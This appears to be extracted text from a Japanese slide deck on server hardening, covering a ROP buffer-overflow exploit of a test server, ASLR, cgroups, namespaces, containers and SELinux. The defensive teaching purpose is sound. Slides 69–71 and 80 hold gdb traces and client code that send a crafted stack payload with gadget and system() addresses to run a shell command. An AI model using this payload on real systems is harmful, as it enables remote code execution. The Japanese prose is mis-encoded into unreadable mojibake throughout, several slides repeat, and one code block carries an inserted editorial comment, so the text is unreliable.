    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7931f54 in ?? ()
    (gdb) backtrace
    #0 0x00007ffff7931f54 in ?? ()
    #1 0x00007fffffffd3a0 in ?? ()
    #2 0x00007ffff6f6d350 in ?? ()
    #3 0x00007ffff700e5c0 in ?? ()
    #4 0x00007ffff6f63b90 in ?? ()
    #5 0x0061206863756f74 in ?? ()
    #6 0x0000000000000000 in ?? ()
    (gdb) p &system
    $1 = ( *) 0x7f51c76cd350
    (gdb) disas 0x7ffff7931f54
    No function contains specified address.
    ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹


  69. $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) set disable-randomization off
    (gdb) run
    Starting program: /home/fadis/tiny_server_test/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7931f54 in ?? ()
    (gdb) backtrace
    #0 0x00007ffff7931f54 in ?? ()
    #1 0x00007fffffffd3a0 in ?? ()
    #2 0x00007ffff6f6d350 in ?? ()
    #3 0x00007ffff700e5c0 in ?? ()
    #4 0x00007ffff6f63b90 in ?? ()
    #5 0x0061206863756f74 in ?? ()
    #6 0x0000000000000000 in ?? ()
    (gdb) p &system
    $1 = ( *) 0x7f51c76cd350
    (gdb) disas 0x7ffff7931f54
    No function contains specified address.
    ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹
    system()͕ظ଴ͨ͠ΞυϨεͱҟͳΔ৔ॴʹ഑ஔ͞Ε͍ͯΔ
    0x00007ffff6f6d350
    0x7f51c76cd350
    ASLRແ͠ͷ৔߹ʹsystem()͕ஔ͍ͯ͋ͬͨ৔ॴ
    ࣮ࡍʹsystem()͕
    ഑ஔ͞Ε͍ͯͨ৔ॴ


  70. $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) set disable-randomization off
    (gdb) run
    Starting program: /home/fadis/tiny_server_test/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7931f54 in ?? ()
    (gdb) backtrace
    #0 0x00007ffff7931f54 in ?? ()
    #1 0x00007fffffffd3a0 in ?? ()
    #2 0x00007ffff6f6d350 in ?? ()
    #3 0x00007ffff700e5c0 in ?? ()
    #4 0x00007ffff6f63b90 in ?? ()
    #5 0x0061206863756f74 in ?? ()
    #6 0x0000000000000000 in ?? ()
    (gdb) p &system
    $1 = ( *) 0x7f51c76cd350
    (gdb) disas 0x7ffff7931f54
    No function contains specified address.
    ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹
    ͦΕҎલʹ࠷ॳʹpop %rdi͢Δҝͷίʔυย͕
    ظ଴ͨ͠৔ॴʹͳ͍
    0x00007ffff7931f54
    No function contains specified address
    ASLRແ͠ͷ৔߹ʹpop %rdiͱretq͕͋ͬͨ৔ॴ
    ͦ͜ʹؔ਺͸ແ͍


  71. $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) set disable-randomization off
    (gdb) run
    Starting program: /home/fadis/tiny_server_test/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7931f54 in ?? ()
    (gdb) backtrace
    #0 0x00007ffff7931f54 in ?? ()
    #1 0x00007fffffffd3a0 in ?? ()
    #2 0x00007ffff6f6d350 in ?? ()
    #3 0x00007ffff700e5c0 in ?? ()
    #4 0x00007ffff6f63b90 in ?? ()
    #5 0x0061206863756f74 in ?? ()
    #6 0x0000000000000000 in ?? ()
    (gdb) p &system
    $1 = ( *) 0x7f51c76cd350
    (gdb) disas 0x7ffff7931f54
    No function contains specified address.
    ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹
    ͦͷ݁Ռ
    Կ΋ׂΓ౰ͯΒΕ͍ͯͳ͍ϝϞϦʹretqͰඈ΅͏ͱͯ͠
    ൣғ֎ࢀরͰϓϩηε͕ఀࢭͨ͠
    ߈ܸऀ͕೚ҙͷίʔυΛ࣮ߦͰ͖Δ੬ऑੑΛ
    ߈ܸऀ͕DoS߈ܸΛͰ͖Δ੬ऑੑʹऑΊΔࣄ͕Ͱ͖ͨ


  72. LinuxͷίϯςφΛ׆༻ͤΑ


  73. ਌ϓϩηεͱࢠϓϩηε
    ϓϩηεத͔ΒผͷϓϩηεΛ্ཱͪ͛Δͱ
    ͦͷϓϩηε͸ݩͷϓϩηεͷࢠʹͳΔ
    ϓϩηε
    /bin/ls
    execl("/bin/ls","/bin/ls",nullptr );
    ىಈ
    ਌ϓϩηε
    ࢠϓϩηε


  74. init!"!5*[agetty]
    #!busybox
    #!login!!!bash!!!top
    #!sshd!"!sshd!!!sshd!!!bash!!!pstree
    $ %!sshd!!!sshd!!!bash!!!vim
    %!udevd
    γεςϜىಈ࣌ʹ࣮ߦ͞ΕΔ
    initҎ֎ͷશͯͷϓϩηε͸
    init͔ΒḷΕΔ਌ࢠؔ܎ͷͲ͔͜ʹͿΒԼ͕͍ͬͯΔ
    initͷࢠͷ
    sshd͔Βىಈ͞Εͨ
    bash͔Βىಈ͞Εͨ
    vim
    ਌ϓϩηεͱࢠϓϩηε


  75. init!"!5*[agetty]
    #!busybox
    #!login!!!bash!!!top
    #!sshd!"!sshd!!!sshd!!!bash!!!pstree
    $ %!sshd!!!sshd!!!bash!!!vim
    %!udevd
    ࢦఆͨ͠ϓϩηεͱ͔ͦ͜Βੜ·Εͨࢠϓϩηεʹ
    γεςϜͷϦιʔεͷ࢖༻ʹؔ͢Δ੍ݶΛઃఆ͢Δ
    cgroups
    ྫ:
    ͜ͷൣғͷϓϩηε͸
    1൪໨ͷCPU͔͠
    ࢖ͬͯ͸͍͚ͳ͍
    (cpuset cgroup)


  76. ϒϩοΫI/O cgroup
    ࢦఆͨ͠ϓϩηεάϧʔϓ͔Βͷ
    ϒϩοΫσόΠε΁ͷI/OΛ੍ݶ͢Δ
    ͜ͷάϧʔϓ಺ͷϓϩηε͸
    ͲΜͳʹετϨʔδʹ༨ྗ͕͋ͬͯ΋
    ࢦఆ͞ΕͨҎ্ͷI/OଳҬΛ࢖͑ͳ͍
    ߹ܭMbps੍ݶ


  77. ະ࢖༻
    CPU cgroup
    ࢦఆͨ͠ϓϩηεάϧʔϓ͔Βͷ
    CPUͷ࢖༻཰Λ੍ݶ͢Δ
    ͜ͷάϧʔϓ಺ͷϓϩηε͸
    ͲΜͳʹCPUʹ༨ྗ͕͋ͬͯ΋
    ࢦఆ͞ΕͨҎ্ʹ
    CPUΛ࢖͏ࣄ͸Ͱ͖ͳ͍
    ߹ܭ੍ݶ


  78. cgroups
    ଞʹ΋ϝϞϦͷ࢖༻཰΍HugeTLBͷׂΓ౰ͯͷ੍ݶͳͲ͕
    උΘ͍ͬͯΔ͕
    ੬ऑੑ߈ܸʹର͢Δඋ͑ͱͯ͠஫໨͢΂͖ͳͷ͸
    pids devices
    ͱ


  79. PIDs cgroups
    ࢦఆͨ͠ϓϩηεάϧʔϓ಺Ͱ
    ࡞੒Ͱ͖Δϓϩηεͷ࠷େ਺Λ੍ݶ͢Δ
    ϓϩηε
    /bin/ls
    execl("/bin/ls","/bin/ls",nullptr );
    ىಈ
    άϧʔϓ಺ͷϓϩηε਺͕࠷େʹୡ͍ͯ͠Δҝ
    ࢠϓϩηεͷੜ੒Λڋ൱


  80. tcp::socket socket(io_service);
    socket.connect(
    tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 )
    );
    const std::vector< uint8_t > command{
    't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    };
    std::vector< uint8_t > data {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
    0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
    0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
    };
    for( size_t i = 0u; i != 10u; ++i )
    std::copy( command.begin(), command.end(), std::back_inserter( data ) );
    data.push_back( 0x0d );
    ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ
    system()
    γΣϧεΫϦϓτ
    ߈ܸऀ͕όοϑΝΦʔόʔϥϯ͔Β
    ೚ҙͷॲཧͷ࣮ߦʹܨ͛Δ࠷΋खܰͳํ๏system()͸
    தͰࢠϓϩηεΛੜ੒͍ͯ͠Δҝ
    ࢠϓϩηε͕ੜ੒ग़དྷͳ͍ͱ߈ܸ͕େม໘౗ʹͳΔ


  81. $ g++ sample.c -o sample
    $ ./sample
    bin dev home lib32 lost+found mnt proc run sys usr
    boot etc lib lib64 media opt root sbin tmp var
    ੒ޭ
    $ cgcreate -g pids:test
    $ cgset -r pids.max=1 test
    $ cgexec -g pids:test ./sample
    ࣦഊ
    $
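    #include <cstdlib>
    #include <iostream>

    /// Demo program for the pids cgroup slide: system() must fork a child, so
    /// it succeeds under normal conditions and fails once the cgroup's
    /// pids.max is reached. Prints "੒ޭ" (success) when "ls /" ran and exited
    /// with status 0, and "ࣦഊ" (failure) otherwise.
    /// The extracted listing had lost the header names on its #include lines;
    /// <cstdlib> (std::system) and <iostream> (std::cout) are restored here.
    /// @return 0 always; the printed line is the interesting result.
    int main() {
        // A non-zero value covers both a child that could not be created at
        // all and a child that exited abnormally; only 0 counts as success.
        const int status = std::system( "ls /" );
        if( status == 0 ) {
            std::cout << "੒ޭ" << std::endl;
        } else {
            std::cout << "ࣦഊ" << std::endl;
        }
    }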
    system()͕ػೳ͢ΔͱϧʔτσΟϨΫτϦͷ಺༰Λදࣔ͢ΔϓϩάϥϜ
    ͬ͢ͽΜͰಈ͔͢ͱදࣔ͞ΕΔ
    testͱ͍͏໊લͷpidsʹؔ͢Δ৽͍͠cgroupΛ࡞Δ
    test಺ͷ࠷େϓϩηε਺Λ1ʹ͢Δ
    cgroupΛtestʹͯ͠ಈ͔͢ͱ
    system()ʹࣦഊ͢Δ


  82. ͨͩ͜͠ͷ੍ݶΛ͔͚Δͱ
    αʔόͷຊདྷͷ༻్Ͱ΋ࢠϓϩηε͕࡞Εͳ͘ͳΔ
    ͜ͷख͕࢖͑Δͷ͸
    ໌Β͔ʹࢠϓϩηεΛඞཁͱ͠ͳ͍αʔϏεʹݶΒΕΔ


  83. devices cgroups
    ࢦఆͨ͠ϓϩηεάϧʔϓ಺͔Β
    ৮ͬͯྑ͍σόΠεΛ੍ݶ͢Δ
    αʔό
    γΣϧ
    ىಈ
    ࠓ߈ܸऀ͸ҰൠϢʔβͰͷγΣϧͷىಈʹ੒ޭ͠
    α΢ϯυσόΠεͷ੬ऑੑΛಥ͍ͯ
    rootΛऔΖ͏ͱ͍ͯ͠Δ
    CVE-2017-15265
    ߈ܸऀ
    ੬ऑͳ
    Linux


  84. devices cgroups
    ࢦఆͨ͠ϓϩηεάϧʔϓ಺͔Β
    ৮ͬͯྑ͍σόΠεΛ੍ݶ͢Δ
    αʔό
    γΣϧ
    ىಈ CVE-2017-15265
    ߈ܸऀ
    ͜ͷάϧʔϓʹ͸α΢ϯυσόΠε͸͍Βͳ͍ഺͳͷͰ
    α΢ϯυσόΠεΛ৮ͬͯ͸͍͚ͳ͍ ੬ऑͳ
    Linux
    ͜͏͍͏੍ݶΛ͋Β͔͡Ί͔͚Δࣄ͕Ͱ͖Δ


  85. ໊લۭؒ
    ࢦఆͨ͠ϓϩηεͱ͔ͦ͜Βੜ·Εͨࢠϓϩηε͔Β
    Կ͕ݟ͑Δ͔Λ੍ݶ͢Δ
    init!"!5*[agetty]
    #!busybox
    #!login!!!bash!!!top
    #!sshd!"!sshd!!!sshd!!!bash!!!pstree
    $ %!sshd!!!sshd!!!bash!!!vim
    %!udevd
    ྫ:
    ͜ͷൣғͷϓϩηεʹ͸
    ֎ͷϓϩηε͕ݟ͑ͳ͍
    (PID໊લۭؒ)
    bash!!!vim
    ͜ͷ໊લۭؒʹͱͬͯͷPID1
    ຊ౰ͷPID1


  86. Ϛ΢ϯτ໊લۭؒ
    Ͳ͜ʹԿ͕Ϛ΢ϯτ͞Ε͍ͯΔ͔ͷ৘ใΛ
    ਌ϓϩηε͔Β෼཭͢Δ
    ਌ϓϩηε
    ࢠϓϩηε
    hoge
    fuga
    hoge
    fuga
    ਌ϓϩηε͔Βݟ͑Δ/hoge/fuga
    ࢠϓϩηε͔Βݟ͑Δ/hoge/fuga
    chroot΍umountͱ૊Έ߹ΘͤΔࣄͰ
    ࢠϓϩηε͔Β਌ϓϩηεͷσΟϨΫτϦπϦʔͷଘࡏΛ
    ݟ͑ͳ͘͢Δࣄ͕Ͱ͖Δ


  87. Ϛ΢ϯτ໊લۭؒ
    hoge
    fuga
    ߈ܸʹ࢖͑ͦ͏ͳ΋Μ͕
    ͳΜ΋ͳ͍…
    αʔόΛಈ͔͢ͷʹඞཁͳ࠷খݶͷϑΝΠϧ͚͕ͩݟ͑Δ
    σΟϨΫτϦπϦʔΛ/ͱͯ͠αʔόΛಈ͔͢ࣄͰ
    ߈ܸऀͷબ୒ࢶΛڱΊΔࣄ͕Ͱ͖Δ
    ߈ܸऀ


  88. UID໊લۭؒ
    ಛఆͷ໊લۭؒʹଐ͢ϓϩηεͷΈʹ
    ௨༻͢ΔrootΛ࡞Γग़͢
    ߈ܸऀ
    Զ͸ࠓ͔Β
    rootͩ!


  89. UID໊લۭؒ
    ಛఆͷ໊લۭؒʹଐ͢ϓϩηεʹͷΈ
    ௨༻͢ΔrootΛ࡞Γग़͢
    ߈ܸऀ
    rootͷ໋ྩͩͧ! ͋ͳͨ͸ͦͷ○ͷதͰͷΈ
    rootͳͷͰμϝͰ͢


  90. ໊લۭؒ
    ͜ͷଞʹ΋
    ωοτϫʔΫͷઃఆ
    cgroupͷઃఆ
    ઀ଓͰ͖Δϓϩηεؒ௨৴
    ։͍͍ͯΔϑΝΠϧσΟεΫϦϓλ
    ͳͲ৭Μͳ΋ͷΛ
    ਌ϓϩηεͱࢠϓϩηεͰผʹ͢Δࣄ͕Ͱ͖Δ


  91. طʹ
    ؾ͍͍ͮͯΔ͔΋͠Εͳ͍͕


  92. cgroupͱ໊લۭؒΛ׆༻ͯ͠
    ਌ϓϩηεͱࢠϓϩηεʹݟ͑Δ෺
    Ͱ͖ΔࣄΛ׬શʹ෼཭ͨ͠ͷ͕
    LinuxͷίϯςφͰ͋Δ


  93. ਌ϓϩηεͱࢠϓϩηεͷ׬શͳ෼཭ͷઃఆΛ
    ؆୯ʹͰ͖ΔΑ͏ʹ͍ͯ͠Δͷ͕
    ྲྀߦΓͷDockerͰ͋Δ
    https://www.docker.com/


  94. ίϯςφͱϚΠΫϩαʔϏε
    cgroupͱ໊લۭؒ͸ϓϩηε୯ҐͰઃఆ͞ΕΔ
    1ͭͷڊେͳϓϩηεͰ
    αʔϏεΛఏڙ͢ΔΑΓ
    ୯७ͳػೳΛఏڙ͢ΔαʔόΛ
    ωοτϫʔΫͰܨ͍Ͱ
    େ͖ͳαʔϏεΛ࡞Δํ͕
    ݸʑͷϓϩηεʹ༩͑Δ
    ݖݶΛΑΓখ͘͢͞Δࣄ͕Ͱ͖Δ


  95. ίϯςφͱϚΠΫϩαʔϏε
    ͜ͷΑ͏ͳߏ੒ʹͯ͋͠Δͱ
    ϓϩηεͷ͏ͪͷ1͕ͭ
    Ծʹ߈ܸऀͷखʹམͪͨͱͯ͠΋
    ͦͷ࣌఺ͰͷӨڹΛ
    αʔϏε಺ͷݶΒΕͨྖҬʹ
    ͱͲΊΒΕΔ


  96. ͨͩ͠
    ͨ·ʹcgroupͱ໊લۭؒࣗମͷෆ۩߹Ͱ
    ߈ܸऀ͕ίϯςφͷ֎ʹ୤ग़Ͱ͖ͯ͠·͏
    ੬ऑੑ͕ݟ͔ͭΔࣄ͕͋ΔͷͰ஫ҙ
    ྫCVE


  97. SELinuxΛ׆༻ͤΑ


  98. ॴ༗ऀ: Bob
    άϧʔϓ: ΧϨʔಉ޷ձ
    ύʔϛογϣϯ: ॴ༗ऀͱ
    άϧʔϓϝϯόʔ͸
    ಡΈॻ͖OK
    ݹయతͳ*NIXͷύʔϛογϣϯ
    ΧϨʔ԰৘ใ
    Alice
    (ΧϨʔಉ޷ձձһ)
    "MJDF͞Μ͸άϧʔϓϝϯόʔ
    άϧʔϓϝϯόʔͷॻ͖ࠐΈ͸OK
    Linux
    OK
    ͋ͷϑΝΠϧʹ
    ॻ͖͍ͨ


  99. ͜ͷΑ͏ʹϢʔβ͕ࣗ෼Ͱ
    ৘ใΛʹΞΫηε͢ΔͨΊʹඞཁͳݖݶΛઃఆ͢Δ
    ΞΫηε੍ޚΛ
    ೚ҙΞΫηε੍ޚ
    ͱݺͿ


  100. ॴ༗ऀ: Bob
    άϧʔϓ: ΧϨʔಉ޷ձ
    ύʔϛογϣϯ: ॴ༗ऀͱ
    άϧʔϓϝϯόʔ͸
    ಡΈॻ͖OK
    ΧϨʔ԰৘ใ
    BobΛࣗশ͢Δ
    ߈ܸऀ Bob͞Μ͸
    ϑΝΠϧͷॴ༗ऀ͔ͩΒ
    Bob͞ΜͷཁٻͳΒؒҧ͍ͳ͍
    Linux
    ͋ͷϑΝΠϧΛ
    ࣺͯͨ͘ͳͬͨ
    OK
    ݹయతͳ*NIXͷύʔϛογϣϯͷݶք


  101. ॴ༗ऀ: Charlie
    άϧʔϓ: ΧϨʔಉ޷ձ
    ύʔϛογϣϯ: ୭Ͱ΋ಡΈॻ͖ࣗ༝
    ۃൿ৘ใ
    Charlie
    Charlie͞Μ͸
    ϑΝΠϧͷॴ༗ऀ͔ͩΒ
    Charlie͞ΜͷཁٻͳΒؒҧ͍ͳ͍
    Linux
    OK
    *NIXΑʔΘ͔ΒΜ
    777ʹ͠ͱ͍ͯ
    ݹయతͳ*NIXͷύʔϛογϣϯͷݶք


  102. γεςϜ؅ཧऀ͕γεςϜશମʹ
    ηΩϡϦςΟཁ݅Λڧ੍͢Δ
    ڧ੍ΞΫηε੍ޚ
    ͕ཁΔ
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
    Charlie͕ͲΜͳʹζϘϥͰ΋
    γεςϜશମͷηΩϡϦςΟ͸อͨΕΔඞཁ͕͋Δ


  103. ୭͔ͩΒʙ͕Ͱ͖Δ
    ͱ͍͏ܗҎ֎ͷํ๏ʹΑΔΞΫηε੍ޚ͕ཁΔ
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
    BobຊਓͱBobʹͳΓ͢·͢߈ܸऀΛ۠ผ͢Δʹ͸
    ୭͔͸࢖͍෺ʹͳΒͳ͍


  104. શͯͷϓϩηεʹ͸਌ࢠؔ܎͕͋Δ
    ͋Δ೔ͷBob͞Μͷϓϩηε
    Bob
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
    ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
    Ոͷ૟আΛ͢Δ


  105. ίϯϏχʹߦ్͘தͰѱ͍ਓʹั·ΓೖΕସΘΔ
    ΧϨʔಉ޷ձͷϊʔτʹམॻ͖Λ͢Δ
    ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
    Ոͷ૟আΛ͢Δ
    Bob
    BobʹͳΓ͢·ͨ͠
    ߈ܸऀ
    ϓϩηε͕߈ܸऀͷखʹམͪΔͱ
    ͜͏͍͏ঢ়ଶʹͳΔ
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏


  106. ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
    Ոͷ૟আΛ͢Δ
    ϓϩηεʹυϝΠϯΛ͚ͭΑ͏
    υϝΠϯ͸͋Β͔͡Ί༻ҙ͞Εͨϧʔϧʹैͬͯ෇༩͞Ε
    ࢠϓϩηεʹҾ͖ܧ͕Ε
    SELinuxࣗମͷઃఆݖݶΛ࣋ͨͳ͍Ϣʔβ͸มߋ͸Ͱ͖ͳ͍
    Bob ૟আத
    ૟আத ͜Ε
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏


  107. ૟আத ʹΞΫηεͯ͠ྑ͍΋ͷ
    Ϧιʔεʹ΋υϝΠϯ(λΠϓ)Λ͚ͭΑ͏
    SELinuxࣗମͷઃఆݖݶΛ࣋ͨͳ͍Ϣʔβ͸มߋ͸Ͱ͖ͳ͍
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏


  108. ίϯϏχʹߦ్͘தͰѱ͍ਓʹั·ΓೖΕସΘΔ
    ΧϨʔಉ޷ձͷϊʔτʹམॻ͖Λ͢Δ
    Ոͷ૟আΛ͢Δ
    Bob
    ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
    BobʹͳΓ͢·ͨ͠
    ߈ܸऀ
    ͢Δͱ߈ܸऀͷϓϩηε͸͜͏ͳΔ
    ૟আத
    ૟আத
    ૟আத
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏


  109. Linux
    ͳΜ͚ͩͲ
    ΧϨʔಉ޷ձͷϊʔτʹॻ͖ࠐΈͤͯ͞
    ૟আ͍ͤ
    υϝΠϯͷෆҰகΛཧ༝ʹ
    ৘ใ΁ͷΞΫηεΛڋ൱Ͱ͖Δ
    BobʹͳΓ͢·ͨ͠
    ߈ܸऀ
    ૟আத
    ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏


  110. ॏཁͳϙΠϯτ
    ୭͔ͩΒڐՄ͢Δ
    Ͱ͸ͳ͘
    ԿΛ͍ͯ͠Δ࠷த͔ͩΒڐՄ͢Δ
    ʹͳ͍ͬͯΔ


  111. Æ
    SELinux
    ύʔϛογϣϯ
    system_u:object_r:
    passwd_exec_t
    Bob
    ॴ༗ऀ: Bob
    ॴ༗ऀͷಡΈॻ͖OK
    ಡΜͰOK

    SELinux
    passwd_exec_t
    ͸ಡΜͰྑ͍
    ಡΜͰOK
    ૯ධ
    ಡΜͰOK
    ͋ͷϑΝΠϧ
    ݟͤͯ
    Bob͞Μ͕ࣗ෼Ͱ
    ઃఆͰ͖Δൣғ
    SELinux
    passwd_exec_t
    ͸࢖ͬͯ͸͍͚ͳ͍
    ࢖༻ېࢭ
    ૯ධ
    ࢖༻ېࢭ
    8080
    8080൪ϙʔτΛ
    ࢖͍͍ͨͳ


  112. $ sesearch --allow

    allow passwd_t crack_db_t:dir { getattr ioctl lock open read search };
    allow passwd_t crack_db_t:file { getattr ioctl lock open read };
    allow passwd_t default_context_t:dir { getattr open search };
    allow passwd_t device_t:dir { getattr ioctl lock open read search };

    allow passwd_t shadow_t:file { append create getattr ioctl link lock open read relabelfrom relabelto rename
    setattr unlink write };

    allow passwd_t passwd_exec_t:file { entrypoint execute getattr ioctl lock map open read };

    allow user_t passwd_exec_t:file { execute getattr open read };
    allow user_t passwd_t:process transition;

    ҰൠϢʔβ͕ී௨ʹϩάΠϯ͖ͯͨ͠ঢ়گ͔Β
    passwd_exec_tʹଐ͢ίϚϯυΛ࣮ߦ͢Δࣄ͕Ͱ͖Δ
    passwd_tυϝΠϯ΁ͷભҠ͕ೝΊΒΕΔ
    passwd_exec_tʹ
    ଐ͢ίϚϯυͷ࣮ߦ࣌ʹ
    passwd_tʹભҠ͢Δ
    passwd_tυϝΠϯͰ͸passwdΛ࣮ߦ͢Δͷʹඞཁͳ΋ͷ͔͠৮Εͳ͍
    passwd_tͷϓϩηε͸
    shadow_tλΠϓͷ
    ύεϫʔυϑΝΠϧΛ৮ΕΔ


  113. passwd
    ύεϫʔυϑΝΠϧ
    ਖ਼نͷϩάΠϯखॱͰ
    ೖ͖ͬͯͨϢʔβ
    ύεϫʔυͱ
    ؔ܎ͳ͍
    ϑΝΠϧ
    shadow_t΁ͷΞΫηεݖ͕ͳ͍
    ແؔ܎ͳϑΝΠϧ΁ͷ
    ΞΫηεݖ͕ͳ͍
    passwd_tʹભҠ
    Bob
    ਖ਼نͷϩάΠϯखॱͰ
    ೖͬͯ͜ͳ͔ͬͨϢʔβ
    passwd_tʹ
    ભҠ͢Δݖݶ͕ͳ͍
    shadow_t΁ͷ
    ΞΫηεݖ͕ͳ͍
    BobʹͳΓ͢·͢߈ܸऀ
    passwd_t͸shadow_tΛ৮ΕΔ


  114. SELinuxͷઃఆΛద੾ʹߦ͏ࣄͰ
    ߈ܸऀ͕ϓϩηεΛ৐ͬऔͬͨͱͯ͠΋
    ͦͷӨڹΛ
    ͔ͦ͜ΒભҠͰ͖ΔυϝΠϯ͚ͩʹ
    ݶఆͰ͖Δ


  115. SELinux͕ΞΫηεΛڋ൱͢Δͱ
    ҎԼͷΑ͏ͳΧʔωϧϩά͕ग़Δ
    audit: type=1400 audit(1521959710.081:83): avc: denied
    { setattr } for pid=2168 comm="chmod" name="shadow" dev="vda"
    ino=524679 scontext=staff_u:staff_r:staff_t
    tcontext=system_u:object_r:shadow_t tclass=file
    passwd_tҎ֎ͷυϝΠϯͰ࣮ߦ͞Εͨ
    ίϚϯυchmod͕
    shadow_tλΠϓ͕͍ͭͨϑΝΠϧshadowͷ
    ύʔϛογϣϯΛॻ͖׵͑Α͏ͱͨ͠ҝ
    ڋ൱ͨ͠


  116. audit: type=1400 audit(1521959710.081:83): avc: denied
    { setattr } for pid=2168 comm="chmod" name="shadow" dev="vda"
    ino=524679 scontext=staff_u:staff_r:staff_t
    tcontext=system_u:object_r:shadow_t tclass=file
    ιϑτ΢ΣΞʹ͜ͷૢ࡞Λ͢΂͖ਖ਼౰ͳཧ༝͕͋Δ৔߹
    ͦͷιϑτ΢ΣΞͷҝͷ৽͍͠υϝΠϯΛ࡞Ζ͏
    ͦͷιϑτ΢ΣΞ͕ਖ਼ৗʹ࢖ΘΕΔͱ͖ʹ
    ͦͷυϝΠϯʹભҠͰ͖ΔݖݶΛ༩͑Α͏
    ͦͷυϝΠϯʹඞཁͳૢ࡞Λߦ͏ݖݶΛ༩͑Α͏


  117. ࣮ࡍͷSELinuxͷઃఆखॱ͸௕͘ͳΔͷͰׂѪ
    ίϚϯυ΍ઃఆϑΝΠϧͷ࢖͍ํ͸
    RedHatͷυΩϡϝϯτʹΑ͘·ͱ·͍ͬͯΔ
    https://access.redhat.com/documentation/ja-jp/red_hat_enterprise_linux/7/html/
    selinux_users_and_administrators_guide/
    ͜͜ʹ
    RedHatͷSELinuxϢʔβʔͱ؅ཧऀͷΨΠυΛషΔ


  118. RedHatҎ֎ͷσΟετϦϏϡʔγϣϯΛ࢖͏৔߹
    γεςϜͷϢʔβ΍λΠϓ໊ɺͦͷݖݶͷൣғ͕
    ҟͳ͍ͬͯΔՄೳੑ͕͋Δ
    ࢖༻͢ΔσΟετϦϏϡʔγϣϯʹ
    SELinuxʹؔ͢Δઆ໌͕͋Δ৔߹͸
    ͦͪΒ΋ࢀর͢΂͠


  119. ੬ऑੑ৘ใͷ௥͍ํ


  120. αʔό্Ͱಈ͍͍ͯΔͷ͕
    ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ͚ͩ
    ͱ͍͏έʔε͸كͰ͋Δ
    ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ
    ศརͳ
    ϥΠϒϥϦ
    ศརͳ
    ϥΠϒϥϦ
    ศརͳ
    ϥΠϒϥϦ
    ศརͳ
    ϥΠϒϥϦ
    Χʔωϧ(OS)
    υϥΠό υϥΠό
    ϋʔυ΢ΣΞ ϋʔυ΢ΣΞ
    ศརͳϥΠϒϥϦ


  121. ࣗ෼Ͱ࡞͍ͬͯͳ͍෦෼Ͱ੬ऑੑ͕ݟ͔ͭͬͯ
    ࣗ෼ͷιϑτ΢ΣΞ͕҆શͰͳ͘ͳΔ͜ͱ͸Α͋͘Δ
    ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ
    ศརͳ
    ϥΠϒϥϦ
    ศརͳ
    ϥΠϒϥϦ
    ศརͳ
    ϥΠϒϥϦ
    ศརͳ
    ϥΠϒϥϦ
    Χʔωϧ
    υϥΠό υϥΠό
    ϋʔυ΢ΣΞ ϋʔυ΢ΣΞ
    ศརͳϥΠϒϥϦ


  122. ར༻͍ͯ͠Δ
    Αͦͷιϑτ΢ΣΞͷ
    ੬ऑੑ৘ใΛؾʹ͔͚Α͏


  123. Common Vulnerabilities and Exposures
    ڞ௨੬ऑੑࣝผࢠ ུͯ͠CVE

    ੈքதͰݟ͔ͭͬͨ੬ऑੑʹ
    ҰҙͳIDΛׂΓ౰ͯͯσʔλϕʔεԽ͍ͯ͠Δ
    http://www.cve.mitre.org/
    ͜͜ʹ
    CVEͷWebαΠτͷτοϓϖʔδΛషΔ


